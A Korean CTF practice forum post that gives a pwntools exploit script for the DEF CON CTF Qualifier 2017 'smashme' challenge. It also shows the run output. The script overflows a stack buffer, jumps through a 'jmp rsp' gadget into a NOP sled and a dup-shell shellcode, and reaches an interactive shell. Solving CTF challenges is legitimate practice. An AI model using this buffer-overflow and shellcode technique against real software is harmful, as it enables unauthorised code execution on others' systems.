[DEF CON CTF Qualifier 2017] smashme

해킹대회 문제 풀이 연습장소

Moderator: amesianx

Post Reply
amesianx
Posts: 65
Joined: Tue Oct 13, 2015 11:21 am

[DEF CON CTF Qualifier 2017] smashme

Post by amesianx » Mon May 01, 2017 8:17 pm

Code: Select all

from pwn import *

context(arch='amd64', os='linux')

elf = ELF('./smashme')
rop = ROP(elf)

#conn = remote('smashme_omgbabysfirst.quals.shallweplayaga.me', 57348)
conn = process(['./smashme'])
print conn.recvuntil('Welcome to the Dr. Phil Show. Wanna smash?')
k = 'Smash me outside, how bout dAAAAAAAAAAA\0'
shellcode = asm(shellcraft.dupsh(4))
jmp_rsp = p64(elf.search(asm("jmp rsp")).next())
jmp = "\x90\x90\xeb\x16"
nop = "\x90"*60
conn.send(k.ljust(72, 'A') + jmp_rsp + jmp + nop + shellcode + '\n')
conn.interactive()

Code: Select all

root@e2837c6b25fd ~/CTF/defcon
# python ex.py
[*] '/root/CTF/defcon/smashme'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
[*] Loaded cached gadgets for './smashme'
[+] Starting local process './smashme': pid 9188
Welcome to the Dr. Phil Show. Wanna smash?

[*] Switching to interactive mode

$ ls -al
total 332324
drwxr-xr-x  9 1002 1002      4096 May  1 11:18 .
drwxr-xr-x 14 1002 1002      4096 Apr 29 14:52 ..

solve2.png
solve
solve2.png (250.94 KiB) Viewed 240 times

Post Reply

Who is online

Users browsing this forum: No registered users and 18 guests